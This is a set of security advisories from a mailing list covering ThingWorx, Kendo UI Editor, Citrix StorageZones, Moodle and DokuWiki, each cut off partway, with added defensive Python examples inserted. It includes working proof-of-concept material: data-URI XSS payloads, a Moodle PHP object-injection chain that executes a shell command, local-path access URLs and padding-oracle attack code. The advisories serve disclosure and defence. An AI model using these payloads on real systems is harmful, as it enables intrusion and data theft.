 CVE number: CVE-2018-17216, CVE-2018-17217, CVE-2018-17218
 impact: critical
   homepage: https://www.ptc.com
  found: 2018-03-13
 by: M. Tomaselli (Office Munich)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"ThingWorx is more than an IoT platform; it provides the functionality,
flexibility and scalability that businesses need to drive industrial
innovation─including the ability to source, contextualize and synthesize
data while orchestrating processes and delivering powerful web, mobile
and AR experiences."

Source: https://www.ptc.com/en/thingworx8


Business recommendation:

ThingWorx allows to configure Things to communicate with other services over
several protocols (e.g. LDAP integration via a DirectoryServices Thing). In
order to communicate with services that require authentication, ThingWorx
provides functionality to associate credentials with a Thing.

During a brief audit it was noticed that ThingWorx Composer leaks the
following sensitive data:

 1) The PBKDF2WithHmac512 password hash of a user Thing
 2) The AES encrypted password of several Things containing password attributes

Furthermore, the password used for encryption is hard-coded and thus identical
across all installations.

Besides the above mentioned vulnerabilities a reflected cross-site scripting
vulnerability was identified in the ThingWorx SQUEAL search function.

The vendor provides a patch which should be installed immediately.
It is recommended to perform further thorough security audits as the product
may be affected by other potential security vulnerabilities.


Vulnerability overview/description:
---
1) Disclosure of User Password Hashes to Privileged Users (CVE-2018-17216)
ThingWorx discloses the PBKDF2WithHmac512 hashed passwords of its application
users when doing exports with an administrative account. This enables an
attacker to conduct offline brute-force or dictionary attacks against the
obtained password hashes.


2) Disclosure of Encrypted Credentials and Use of Hard-Coded Passwords
(CVE-2018-17217)
A critical information disclosure vulnerability leaks the AES encrypted
passwords of services configured within ThingWorx. Due to a hard-coded
master password in the SecureData class, an attacker is able to decrypt the
obtained passwords, which grants access to the other services. The AES encrypted
password is disclosed in the server response when a user/attacker visits a
Thing that contains credentials.


3) Reflected Cross-Site Scripting (CVE-2018-17218)
The JavaScript part of the ThingWorx SQUEAL search functionality
(searchExpression parameter), which is responsible for parsing the obtained JSON
response, fails to properly sanitize user supplied input. If the victim views
attacker-prepared content (e.g. on a website or in an HTML email), an attacker
is able to execute arbitrary actions in the context of the victim's session.


Proof of concept:
-
The proof of concept has been removed from this advisory.


Vulnerable / tested versions:
-
The vulnerabilities have been verified to exist in version 8.0.1-b39 which was
the latest version available at the time of the test.

The vendor provided further affected version information. See the Solution
section for reference.


Vendor contact timeline:

2018-03-14: Contacting vendor through email
2018-03-16: Advisory sent to vendor via encrypted mail
2018-03 - 2018-09: Multiple phone calls with PTC R&D department
discussing release & multi-party disclosure
2018-08-15: Vendor provided private notifications to customers to give
45 days to upgrade
2018-10-01: Coordinated release of SEC Consult advisory


Solution:
-
The best recommendation is to upgrade to the latest version of ThingWorx,
which is version 8.3.2 at the time of writing.

In newer versions, the hard-coded password issue has been fixed
and the SQUEAL function has been removed.

The minimum upgrade to obtain mitigations for all 3 issues depends
on the version of ThingWorx in use.

For ThingWorx versions 6.5-7.4, upgrade to 7.4.14+
For ThingWorx version 8.0.x, upgrade to 8.0.12+
For ThingWorx version 8.1.x, upgrade to 8.1.7+
For ThingWorx version 8.2.x, upgrade to 8.2.4+

The vendor always recommends upgradin

SEC Consult SA-20180926-0 ::

2018-09-27 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20180926-0 >
===
  title: Stored Cross-Site Scripting
product: Progress Kendo UI Editor
 vulnerable version: v2018.1.221
  fixed version: none, see workaround
 CVE number: CVE-2018-14037
 impact: medium
   homepage: https://www.progress.com/kendo-ui
  found: 2018-04-23
 by: M. Tomaselli (Office Munich)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"The Editor allows users to create rich text content by means of a WYSIWYG
interface. This HTML5 widget outputs identical HTML across all major browsers,
follows accessibility standards and provides an API for content manipulation.
The generated widget value is comprised of XHTML markup."

https://www.telerik.com/kendo-ui/editor


Business recommendation:

SEC Consult recommends to implement the workarounds provided by the vendor.


Vulnerability overview/description:
---
The demo application of the Kendo UI Editor which is hosted at
https://demos.telerik.com/kendo-ui/editor/api implements a Sanitizer function
which should protect from cross site scripting. However, the implemented
Sanitizer fails to catch certain payloads which allow an attacker to execute
JavaScript in the context of the editor itself.


Proof of concept:
-
The following, incomplete list, of payloads can be used to trigger an alert
box in the API demo application of the Kendo UI Editor:
https://demos.telerik.com/kendo-ui/editor/api








After a click on the button the setValue function on line 513 of the beautified
"api.js" is called:

var setValue = function () {
    editor.value($("#value").val());
};


The value function is implemented in line 64383 of the beautified "kendo.all.js"
file and defined as:

value: function (html) {
    var body = this.body, editorNS = kendo.ui.editor, options =
        this.options, currentHtml = editorNS.Serializer.domToXhtml(body,
        options.serialization);
    if (html === undefined) {
        return currentHtml;
    }
    if (html == currentHtml) {
        return;
    }
    editorNS.Serializer.htmlToDom(html, body, options.deserialization);
    this.selectionRestorePoint = null;
    this.update();
    this.toolbar.refreshTools();
},

In order to mitigate certain XSS payloads the editorNS.Serializer.htmlToDom()
function is called which can be seen in the excerpt below:

var Serializer = {
toEditableHtml: function (html) {
return (html || '').replace(//g,
'').replace(/<(\/?)script([^>]*)>/gi,
'<$1k:script$2>').replace(/]*)>/gi, function (match) {
return match.replace(onerrorRe, '');
}).replace(/(<\/?img[^>]*>)[\r\n\v\f\t ]+/gi,
'$1').replace(/^<(table|blockquote)/i, br +
'<$1').replace(/^[\s]*(|\u00a0)/i, 
'$1').replace(/<\/(table|blockquote)>$/i,
'' + br);
},

Although certain payloads are detected and sanitized by the function, the
implemented protection fails to detect the data URI payload. The payload is
added unescaped to the editor DOM after several other function calls.
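The root cause is a blocklist: the serializer rewrites `<script>` and strips `onerror` from `<img>`, and anything it has no rule for, such as a `data:` URI in an `<object>` or a `<meta>` refresh, passes through untouched. The following Python code is an added example (not Kendo code and not from the advisory) that puts a pattern-based blocklist in the spirit of the editor's next to an allowlist sanitizer built on the standard library's html.parser. The payloads are constructed after the advisory's (the base64 bodies decode to `<script>alert(1)</script>`), and the allowed tags, attributes and URL schemes are an assumed policy.

```python
import re
from html import escape
from html.parser import HTMLParser

# Constructed payloads modelled on the advisory's; the base64 bodies decode to
# <script>alert(1)</script>.  The last three are a classic onerror payload,
# an obfuscated javascript: URL and a benign fragment for comparison.
PAYLOADS = [
    '<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>',
    '<meta http-equiv="refresh" content="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">',
    '<img src="x" onerror="alert(1)">',
    '<a href=" JavaScript:alert(1)">x</a>',
    '<p>hello <b>world</b></p>',
]


def blocklist_sanitize(html):
    """Pattern-based filter in the spirit of the editor's serializer: rename
    <script> tags and drop onerror= from <img>.  Everything else passes."""
    html = re.sub(r"<(/?)script([^>]*)>", r"<\1k:script\2>", html, flags=re.I)
    return re.sub(
        r"<img([^>]*)>",
        lambda m: re.sub(r"""\s+onerror\s*=\s*("[^"]*"|'[^']*'|\S+)""", "",
                         m.group(0), flags=re.I),
        html, flags=re.I)


# Allowlist policy (assumption for this example): everything not listed here is
# removed, including <object>, <meta>, <iframe>, <script> and every on* attribute.
ALLOWED = {
    "p": set(), "br": set(), "b": set(), "i": set(), "em": set(), "strong": set(),
    "ul": set(), "ol": set(), "li": set(), "blockquote": set(),
    "a": {"href", "title"}, "img": {"src", "alt", "width", "height"},
}
VOID = {"br", "img"}
URL_ATTRS = {"href", "src"}
SAFE_SCHEMES = ("http:", "https:", "mailto:")
CONTROL_RE = re.compile(r"[\x00-\x20\x7f]")


def url_is_safe(value):
    """Allow relative URLs and an explicit list of schemes.  Whitespace and
    control characters are stripped first so ' java\\nscript:' is not taken
    for a relative path; the comparison is case-insensitive."""
    v = CONTROL_RE.sub("", value).lower()
    first_segment = re.split(r"[/?#]", v, maxsplit=1)[0]
    if ":" not in first_segment:
        return True                 # no scheme -> relative URL
    return v.startswith(SAFE_SCHEMES)


class AllowlistSanitizer(HTMLParser):
    """Rebuilds the document from parsed tokens, keeping only allowed tags,
    allowed attributes and safe URLs.  Text inside dropped tags survives as
    escaped text, so nothing attacker-controlled is emitted as markup."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.dropped = []   # (what, reason), useful for logging

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED:
            self.dropped.append((tag, "tag not allowed"))
            return
        kept = []
        for name, value in attrs:
            value = value or ""
            if name not in ALLOWED[tag]:
                self.dropped.append((f"{tag}@{name}", "attribute not allowed"))
                continue
            if name in URL_ATTRS and not url_is_safe(value):
                self.dropped.append((f"{tag}@{name}", "unsafe URL"))
                continue
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ALLOWED and tag not in VOID:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(escape(data, quote=False))


def allowlist_sanitize(html):
    """Return (clean_html, dropped_items)."""
    parser = AllowlistSanitizer()
    parser.feed(html)
    parser.close()
    return "".join(parser.out), parser.dropped


if __name__ == "__main__":
    for payload in PAYLOADS:
        print("blocklist:", blocklist_sanitize(payload))
        print("allowlist:", allowlist_sanitize(payload)[0])
```

The blocklist leaves the `data:` payloads exactly as submitted, which is the behaviour the advisory describes; the allowlist drops them without knowing anything about `<object>` or `<meta>` specifically, because unknown tags are never re-emitted. In a browser the same design is obtained by parsing into a DOM and walking it, rather than by regular expressions over the serialized string.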


Vulnerable / tested versions:
-
The following version has been identified to be vulnerable:
* v2018.1.221


Vendor contact timeline:

2018-05-02: Contacting vendor through email for security contact
2018-05-02: Contact person requests to obtain advisory via unencrypted mail
2018-05-08: Advisory delivered through unencrypted email to vendor
2018-05-29: Contacting vendor for current status and informing them about the
publishing date
2018-07-02: Reminded the vendor that the advisory will be published soon
2018-07-02: Multiple emails exchanged, vendor demands that customers need to
issue a support ticket on this case
2018-07-03: Telling them that this is a security issue they have known about
for two months without seemingly acting upon it.
Vendor: product managers have been informed and will contact us;
no further info
2018-07-11: Asking vendor again for a status update & patch information
2018-07-11: Vendor: "Thank you for following up. I have sent this to the product
team to take into consideration. They will be following up with you as
they may need. We appreciate you following up regarding this request."
2018-07-12: Detailed answer from vendor regarding workaround
2018-07-13: Requested CVE num

Re: SEC Consult SA-20180926-0 :: Stored Cross-Site Scripting in Progress Kendo UI Editor

2018-09-27 Thread SEC Consult Vulnerability Lab
here with correct email subject :)

On 9/26/18 2:17 PM, SEC Consult Vulnerability Lab wrote:
> SEC Consult Vulnerability Lab Security Advisory < 20180926-0 >
> ===
>   title: Stored Cross-Site Scripting
> product: Progress Kendo UI Editor
>  vulnerable version: v2018.1.221
>   fixed version: none, see workaround
>  CVE number: CVE-2018-14037
>  impact: medium
>homepage: https://www.progress.com/kendo-ui
>   found: 2018-04-23
>  by: M. Tomaselli (Office Munich)
>      SEC Consult Vulnerability Lab
> 
>  An integrated part of SEC Consult
>  Europe | Asia | North America
> 
>  https://www.sec-consult.com
> 
> ===
> 
> Vendor description:
> ---
> "The Editor allows users to create rich text content by means of a WYSIWYG
> interface. This HTML5 widget outputs identical HTML across all major browsers,
> follows accessibility standards and provides an API for content manipulation.
> The generated widget value is comprised of XHTML markup."
> 
> https://www.telerik.com/kendo-ui/editor
> 
> 
> Business recommendation:
> 
> SEC Consult recommends to implement the workarounds provided by the vendor.
> 
> 
> Vulnerability overview/description:
> ---
> The demo application of the Kendo UI Editor which is hosted at
> https://demos.telerik.com/kendo-ui/editor/api implements a Sanitizer function
> which should protect from cross site scripting. However, the implemented
> Sanitizer fails to catch certain payloads which allow an attacker to execute
> JavaScript in the context of the editor itself.
> 
> 
> Proof of concept:
> -
> The following, incomplete list, of payloads can be used to trigger an alert
> box in the API demo application of the Kendo UI Editor:
> https://demos.telerik.com/kendo-ui/editor/api
> 
> 
>  data="data:text/html;base64,PHNjcmlwdD5hbGVydCgic2VjdGVzdCIpPC9zY3JpcHQ+">
> 
>  HTTP-EQUIV="refresh"
> CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
> 
> 
> 
> After a click on the button the setValue function on line 513 of the 
> beautified
> "api.js" is called:
> 
> var setValue = function () {
> editor.value($("#value").val());
> };
> 
> 
> The value function is implemented in line 64383 of the beautified 
> "kendo.all.js"
> file and defined as:
> 
> value: function (html) {
> var body = this.body, editorNS = kendo.ui.editor, options =
> this.options, currentHtml = editorNS.Serializer.domToXhtml(body,
> options.serialization);
> if (html === undefined) {
> return currentHtml;
> }
> if (html == currentHtml) {
> return;
> }
> editorNS.Serializer.htmlToDom(html, body, 
> options.deserialization);
> this.selectionRestorePoint = null;
> this.update();
> this.toolbar.refreshTools();
> },
> 
> In order to mitigate certain XSS payloads the editorNS.Serializer.htmlToDom()
> function is called which can be seen in the excerpt below:
> 
> var Serializer = {
> toEditableHtml: function (html) {
> return (html || '').replace(//g,
> '').replace(/<(\/?)script([^>]*)>/gi,
> '<$1k:script$2>').replace(/]*)>/gi, function (match) {
> return match.replace(onerrorRe, '');
> }).replace(/(<\/?img[^>]*>)[\r\n\v\f\t ]+/gi,
> '$1').replace(/^<(table|blockquote)/i, br +
> '<$1').replace(/^[\s]*(|\u00a0)/i, 
> '$1').replace(/<\/(table|blockquote)>$/i,
> '' + br);
> },
> 
> Although certain payloads are detected and sanitized by the function, the
> implemented protection fails to detect the data uri payload. The payload is
> added unescaped to the editor DOM after several other functions calls.
> 
> 
> Vulnerable / tested versions:
> -
> The following version has been identified to be vulnerable:
> * v2018.1.221
> 
> 
> Vendor contact timeline:
> 
> 2018-05-02: Contacting vendor through email for security contact
> 2018-05-02: Contact person requests to obtain advisory via unencrypted mail
> 2018-05-08: Advisory delivered through unencrypted email to vendor
> 2018-05-29: Contacting vendor for curren

SEC Consult SA-20180924-0 :: Multiple Vulnerabilities in Citrix StorageZones Controller

2018-09-26 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20180924-0 >
===
  title: Multiple Vulnerabilities
product: Citrix StorageZones Controller
 vulnerable version: all versions before 5.4.2
  fixed version: 5.4.2
 CVE number: CVE-2018-16968, CVE-2018-16969
 impact: Medium
   homepage: https://www.citrix.com/
  found: 2018-08
 by: W. Ettlinger (Office Vienna)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"ShareFile is a file sharing service that enables users to easily and securely
exchange documents. ShareFile Enterprise provides enterprise-class service and
includes StorageZones Controller and the User Management Tool. ShareFile
StorageZones Controller extends the ShareFile software as a service (SaaS)
cloud storage by providing your ShareFile account with private data storage,
referred to as StorageZones for ShareFile Data. [...]."

URL: https://docs.citrix.com/en-us/storagezones-controller/5-0.html


Business recommendation:

Users of this product are advised to install the security patch provided by Citrix.

The vulnerabilities identified suggest that no sufficient technical security
audit has yet been conducted on the Citrix StorageZones Controller. SEC Consult
recommends Citrix to conduct such an audit.


Vulnerability overview/description:
---
The Citrix StorageZones Controller exposes resources that are typically only
available to the internal network (e.g. CIFS Windows shares) to clients
connecting from the Internet.

In order to hide internal network paths from the user and in order to only allow
access to paths specifically allowed by the administrator, internal network
paths are encrypted. E.g. if an administrator wants to allow access to a UNC
path (e.g. \\testhost\testshare\testdir) this string is encrypted and provided
to the client. When the user calls the API to e.g. list the contents of this
directory, the StorageZones Controller returns the encrypted absolute paths for
each directory entry. This way, the absolute internal paths are always hidden
from the user.

1) Improper Access Restrictions
Citrix StorageZone Controller offers users a functionality to convert UNC paths
into their encrypted form. Therefore, users are able to access any UNC paths
accessible by the StorageZones Controller.

When providing access to a network share, the StorageZones Controller
impersonates the user. Therefore, unauthorized access to network shares is not
possible.

However, Citrix StorageZones Controller internally does not distinguish between
UNC-paths (e.g. \\testhost\testshare) and local paths (e.g. C:\Windows).
Therefore, users may access (e.g. read, write, delete) local paths for which
they have appropriate NTFS permissions.

Note: Citrix StorageZones allows an administrator to define the paths exposed by
the StorageZones Controller. By configuring this setting an administrator can
restrict access to only network paths. The configuration page incorrectly states
that a value of "*" (the default value) "allows connections to all hosts on the
internal network", while in fact it also allows access to local paths.
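The access restriction the advisory describes fails on a path-type check: a UNC path and a local path must not be treated alike by the endpoint that turns a path into an encrypted token. The following Python function is an added example (not Citrix code and not from the advisory) of the pre-filter such an endpoint should apply before encrypting anything: only `\\host\share\...` paths to configured file servers pass, while drive letters, the `\\?\` and `\\.\` device namespaces, loopback hosts, administrative shares and traversal segments are rejected. The allowed host names and the policy are assumptions for illustration.

```python
import re

# Policy for this example (assumption): only these file servers may be
# exposed, never the StorageZones Controller host itself.
ALLOWED_HOSTS = {"fileserver01", "fileserver01.corp.example"}
LOOPBACK = {"localhost", "127.0.0.1", "::1"}

# \\host\share followed by zero or more \segment parts.  The host must not
# start with '?' or '.', which rules out the \\?\ and \\.\ device namespaces
# (including \\?\UNC\... and \\?\C:\...).
UNC_RE = re.compile(
    r"^\\\\(?P<host>[^\\/?.*][^\\/]*)\\(?P<share>[^\\/]+)(?P<rest>(?:\\[^\\/]*)*)$"
)


def is_allowed_unc(path, allowed_hosts=ALLOWED_HOSTS):
    """True only for \\\\host\\share[\\sub...] where host is an allowed file
    server, the share is not an administrative share (c$, admin$, ...) and
    no path segment is empty, '.' or '..'."""
    p = path.strip().replace("/", "\\")   # Windows accepts both separators
    m = UNC_RE.match(p)
    if not m:
        return False                      # drive letter, device path, junk
    host = m.group("host").lower()
    if host in LOOPBACK or host not in {h.lower() for h in allowed_hosts}:
        return False
    if m.group("share").endswith("$"):
        return False
    segments = m.group("rest").split("\\")[1:]
    return all(seg not in ("", ".", "..") for seg in segments)


if __name__ == "__main__":
    for candidate in [r"\\fileserver01\projects\2018", r"C:\Windows",
                      r"\\?\C:\Windows", r"\\localhost\c$",
                      r"\\fileserver01\projects\..\..\secret"]:
        print(f"{candidate!r:45} -> {is_allowed_unc(candidate)}")
```

This is a syntactic gate, not a substitute for the impersonation the product already does: it decides whether a request is even eligible to be turned into a token, and the impersonated access check still decides what the user may read or write behind it.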

2) Padding Oracle
The encryption mechanism used by the Citrix StorageZones Controller is
vulnerable to a padding oracle attack. This allows an attacker to partly decrypt
or potentially modify internal paths.

3) Path Traversal
The upload functionality is vulnerable to a path traversal attack if the
preconditions to exploit the vulnerability #1 are met. In practice this
vulnerability has a similar effect as vulnerability #1.


Proof of concept:
-
1) Improper Access Restrictions
The following URL demonstrates how local paths can be encrypted:

https:///cifs/v3/Items/ByPath?path=c:\

The following URL demonstrates how e.g. the contents of the directory can be
listed:

https:///cifs/v3/Items()?$expand=Children


2) Padding Oracle
The following script demonstrates how encrypted internal paths can partly be
decrypted. It may also be possible to partly modify encrypted paths (this has
not been verified).
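For readers who have not seen the attack class, the following Python program is an added, self-contained illustration (it is not the advisory's script and not Citrix code) of how a padding oracle turns a yes/no answer about padding into byte-by-byte decryption of CBC ciphertexts. It substitutes a toy keyed block permutation for AES because the attack only uses the CBC chaining, not the block cipher itself; the server object, its key and the example path are constructed for this example. The advisory's own script, which drives the real endpoint through the python-paddingoracle library, follows.

```python
import os
import random

BLOCK = 16


class ToyBlockCipher:
    """Keyed, position-dependent byte substitution standing in for AES.  NOT
    secure; it only has the property the attack relies on: a fixed block-size
    permutation that CBC mode chains together with XOR."""

    def __init__(self, key_seed):
        rng = random.Random(key_seed)
        self.sboxes = [rng.sample(range(256), 256) for _ in range(BLOCK)]
        self.inverse = [{y: x for x, y in enumerate(box)} for box in self.sboxes]

    def encrypt_block(self, block):
        return bytes(self.sboxes[i][b] for i, b in enumerate(block))

    def decrypt_block(self, block):
        return bytes(self.inverse[i][b] for i, b in enumerate(block))


def pad(data):
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def unpad(data):
    """PKCS#7 unpadding; raises ValueError on any malformed padding."""
    if not data or len(data) % BLOCK:
        raise ValueError("bad length")
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def cbc_encrypt(cipher, iv, padded):
    out, prev = [], iv
    for i in range(0, len(padded), BLOCK):
        prev = cipher.encrypt_block(xor(prev, padded[i:i + BLOCK]))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(cipher, iv, ct):
    out, prev = [], iv
    for i in range(0, len(ct), BLOCK):
        block = ct[i:i + BLOCK]
        out.append(xor(cipher.decrypt_block(block), prev))
        prev = block
    return b"".join(out)


class PathTokenService:
    """Stand-in for a server that hands out encrypted internal paths and
    accepts them back.  A padding failure that is distinguishable from every
    other failure is exactly what makes it a padding oracle."""

    def __init__(self):
        self._cipher = ToyBlockCipher(os.urandom(16))   # key never leaves here

    def encrypt_path(self, path):
        iv = os.urandom(BLOCK)
        return iv + cbc_encrypt(self._cipher, iv, pad(path.encode()))

    def padding_is_valid(self, token):
        """The oracle: True iff token decrypts to correctly padded data."""
        try:
            unpad(cbc_decrypt(self._cipher, token[:BLOCK], token[BLOCK:]))
            return True
        except ValueError:
            return False


def padding_oracle_decrypt(token, oracle):
    """Recover the plaintext of an IV||ciphertext token using only oracle()."""
    blocks = [token[i:i + BLOCK] for i in range(0, len(token), BLOCK)]
    plaintext = b""
    for n in range(1, len(blocks)):
        prev, target = blocks[n - 1], blocks[n]
        intermediate = bytearray(BLOCK)          # D(target), found byte by byte
        for pos in range(BLOCK - 1, -1, -1):
            padval = BLOCK - pos
            forged = bytearray(BLOCK)
            for j in range(pos + 1, BLOCK):      # known bytes -> wanted padval
                forged[j] = intermediate[j] ^ padval
            for guess in range(256):
                forged[pos] = guess
                if not oracle(bytes(forged) + target):
                    continue
                if pos == BLOCK - 1:
                    # Edge case: a guess may yield valid padding 0x02 0x02 (or
                    # longer) by accident.  A true 0x01 survives a change to
                    # the byte before it; an accidental longer pad does not.
                    check = bytearray(forged)
                    check[pos - 1] ^= 0xFF
                    if not oracle(bytes(check) + target):
                        continue
                intermediate[pos] = guess ^ padval
                break
            else:
                raise RuntimeError("oracle never accepted a guess")
        plaintext += xor(intermediate, prev)
    return unpad(plaintext)


if __name__ == "__main__":
    service = PathTokenService()
    token = service.encrypt_path(r"\\testhost\testshare\testdir")
    print(padding_oracle_decrypt(token, service.padding_is_valid))
```

The attacker never needs the key: at most 256 oracle queries per byte recover each block. The fix is the same whatever the block cipher, namely authenticating the token (an HMAC over IV and ciphertext, or an AEAD mode) and rejecting it before any decryption, so that malformed padding is never observable.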

 snip 
import sys
sys.path.append('python-paddingoracle')

from paddingoracle import BadPaddingException, PaddingOracle, xor
from base64 import b64encode, b64decode
from urllib import quote, unquote
import requests
import socket
import time
import getpass

URL = 'http:///'
AUTH = (raw_input('User: '),
getpass.getpass('Password: '))

CIPHER = ''

class PadBuster(PaddingOracle):
def __init__(self, **kwargs):
super(PadBuster, self).__i

SEC Consult SA-20180918-0 :: Remote Code Execution via PHP unserialize in Moodle open-source learning platform

2018-09-18 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20180918-0 >
===
  title: Remote Code Execution via PHP unserialize
product: Moodle - Open-source learning platform
 vulnerable version: 3.5 to 3.5.1, 3.4 to 3.4.4, 3.1 to 3.1.13 and
 earlier unsupported versions
  fixed version: 3.5.2, 3.4.5, 3.3.8 and 3.1.14
 CVE number: CVE-2018-14630
 impact: critical
   homepage: https://moodle.org/
  found: 2018-07-08
 by: Johannes Moritz (Office Berlin)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"Moodle is a learning platform designed to provide educators, administrators
and learners with a single robust, secure and integrated system to create
personalised learning environments. Powering tens of thousands of learning
environments globally, Moodle is trusted by institutions and organisations
large and small, including Shell, London School of Economics,
State University of New York, Microsoft and the Open University. Moodle’s
worldwide numbers of more than 90 million users across both academic and
enterprise level usage makes it the world’s most widely used learning platform."

Source: https://moodle.org/about


Business recommendation:

The vendor provides a patch which should be installed immediately.

SEC Consult recommends to perform a thorough security review conducted by
security professionals to identify and resolve all security issues.


Vulnerability overview/description:
---
1) Remote Code Execution via PHP unserialize (CVE-2018-14630)
When importing a "drag and drop into text" (ddwtos) question in the legacy
Moodle XML format, the passed feedback answer is used unsanitized in an
unserialize() call, which leads to a PHP Object Injection vulnerability.
By providing a sophisticated PHP object chain it is possible to leverage the
POI into full-blown arbitrary Remote Code Execution (RCE).

To exploit this vulnerability an attacker needs permissions to create a quiz
or at least be able to import questions. A user of the role teacher usually has
these permissions. However, students can also be assigned to the role teacher
for a specific course.


Proof of concept:
-
1) Remote Code Execution via PHP unserialize (CVE-2018-14630)
In order to exploit this issue an attacker has to open Moodle's question bank
for a specific course and import the following Moodle XML file. The answer
feedback contains a sophisticated PHP object chain which only contains objects
from Moodle's library. After the parsing process the command "echo `whoami`" is
executed.



  

  question name


  

 
  
 

O:15:"\\core\\lock\\lock":2:{s:3:"key";O:23:"\\core_availability\\tree":1:{s:8:"children";O:24:"\\core\\dml\\recordset_walk":2:{s:8:"callback";s:6:"system";s:9:"recordset";O:25:"question_attempt_iterator":2:{s:4:"quba";O:26:"question_usage_by_activity":1:{s:16:"questionattempts";a:1:{s:4:"1337";s:13:"echo `whoami`";}}s:5:"slots";a:1:{i:0;i:1337;s:8:"infinite";i:1;}
 
  
 
  



Vulnerable / tested versions:
-
The following version has been tested which was the most recent one at the
time of the test:

* 3.5.1+

According to the vendor, all previous versions are affected as well:
* 3.5 to 3.5.1, 3.4 to 3.4.4, 3.1 to 3.1.13 and earlier unsupported versions


Vendor contact timeline:

2018-07-08: Vulnerability identified, further analysis (credits to Robin Peraglie
from RIPS Technologies)
2018-07-09: Contacting vendor through tracker.moodle.org (issue [MDL-62880]
created)
2018-07-09: Vendor replied and supplied a fix for the vulnerability
2018-09-10: Vendor releases patched version
2018-09-18: Public release of security advisory


Solution:
-
The vendor provides a patched version (3.5.2) which should be installed immediately:
https://download.moodle.org/releases/latest/

The vendor also provided a security advisory regarding this issue:
https://moodle.org/mod/forum/discuss.php?d=376023#p1516118


Workaround:
---
Disable import of ddwtos questions through XML files.
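Where disabling the import is not an option, a pre-import check can at least refuse XML that carries serialized PHP objects, which have no legitimate place in question text or feedback. The following Python code is an added example (not Moodle code and not from the advisory): it walks a Moodle XML question file and reports serialized PHP object strings in any text node, plus question types blocked by policy. The sample XML is constructed; its element names follow the Moodle XML format only as far as this example assumes it, and the serialized string is a shortened version of the advisory's chain.

```python
import re
import xml.etree.ElementTree as ET

# Constructed Moodle XML sample (element names are this example's assumption
# about the format).  The first question carries a shortened version of the
# serialized object chain from the advisory in its feedback text.
SAMPLE_XML = r"""<quiz>
  <question type="ddwtos">
    <name><text>question name</text></name>
    <questiontext format="html"><text>Drag [[1]] here.</text></questiontext>
    <dragbox><text>one</text><group>1</group></dragbox>
    <feedback format="html"><text><![CDATA[O:15:"\\core\\lock\\lock":2:{s:3:"key";O:24:"\\core\\dml\\recordset_walk":2:{s:8:"callback";s:6:"system";}}]]></text></feedback>
  </question>
  <question type="multichoice">
    <name><text>harmless</text></name>
    <answer fraction="100"><text>yes</text><feedback><text>well done: O:K</text></feedback></answer>
  </question>
</quiz>
"""

# PHP serialized object: O:<name length>:"<class>":<property count>:{
# The class name may carry leading backslashes, as in the advisory's payload.
PHP_OBJECT_RE = re.compile(r'O:\d+:"([^"]{1,200})":\d+:\{')


def php_serialized_objects(text):
    """Class names of all PHP serialized objects embedded in text."""
    return PHP_OBJECT_RE.findall(text or "")


def scan_question_xml(xml_text, blocked_types=("ddwtos",)):
    """Return findings as (question name, type, reason, detail) tuples."""
    root = ET.fromstring(xml_text)
    findings = []
    for question in root.iter("question"):
        qtype = question.get("type", "")
        name = (question.findtext("name/text") or "").strip()
        if qtype in blocked_types:
            findings.append((name, qtype, "question type blocked by policy", None))
        for element in question.iter():
            classes = php_serialized_objects(element.text)
            if classes:
                findings.append((name, qtype,
                                 f"serialized PHP object in <{element.tag}>",
                                 classes))
    return findings


def import_is_safe(xml_text, blocked_types=("ddwtos",)):
    """Gate for an import pipeline: True only if nothing was flagged."""
    return not scan_question_xml(xml_text, blocked_types)


if __name__ == "__main__":
    for finding in scan_question_xml(SAMPLE_XML):
        print(finding)
```

The check is a detection layer, not the fix: the advisory's root cause is that the import hands attacker-controlled text to unserialize() at all, and the patched versions are the actual remedy. The scanner is still useful on the way in, because a serialized object in a feedback field is a reliable indicator of an import attempt worth logging and investigating.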


Advisory URL:
-
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Europe | A

SEC Consult SA-20180906-0 :: CSV Formula Injection in DokuWiki

2018-09-07 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20180906-0 >
===
  title: CSV Formula Injection
product: DokuWiki
 vulnerable version: 2018-04-22a "Greebo" and older versions
  fixed version: None
 CVE number: CVE-2018-15474
 impact: Medium
   homepage: https://www.dokuwiki.org
  found: 2018-07-09
 by: Jean-Benjamin Rousseau (Office Zurich)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"DokuWiki is a simple to use and highly versatile Open Source wiki software
that doesn't require a database. It is loved by users for its clean and
readable syntax. The ease of maintenance, backup and integration makes it
an administrator's favorite. Built in access controls and authentication
connectors make DokuWiki especially useful in the enterprise context
and the large number of plugins contributed by its vibrant community allow
for a broad range of use cases beyond a traditional wiki."

Source: https://www.dokuwiki.org/dokuwiki


Business recommendation:

The issue will not be fixed according to the vendor. Users are advised
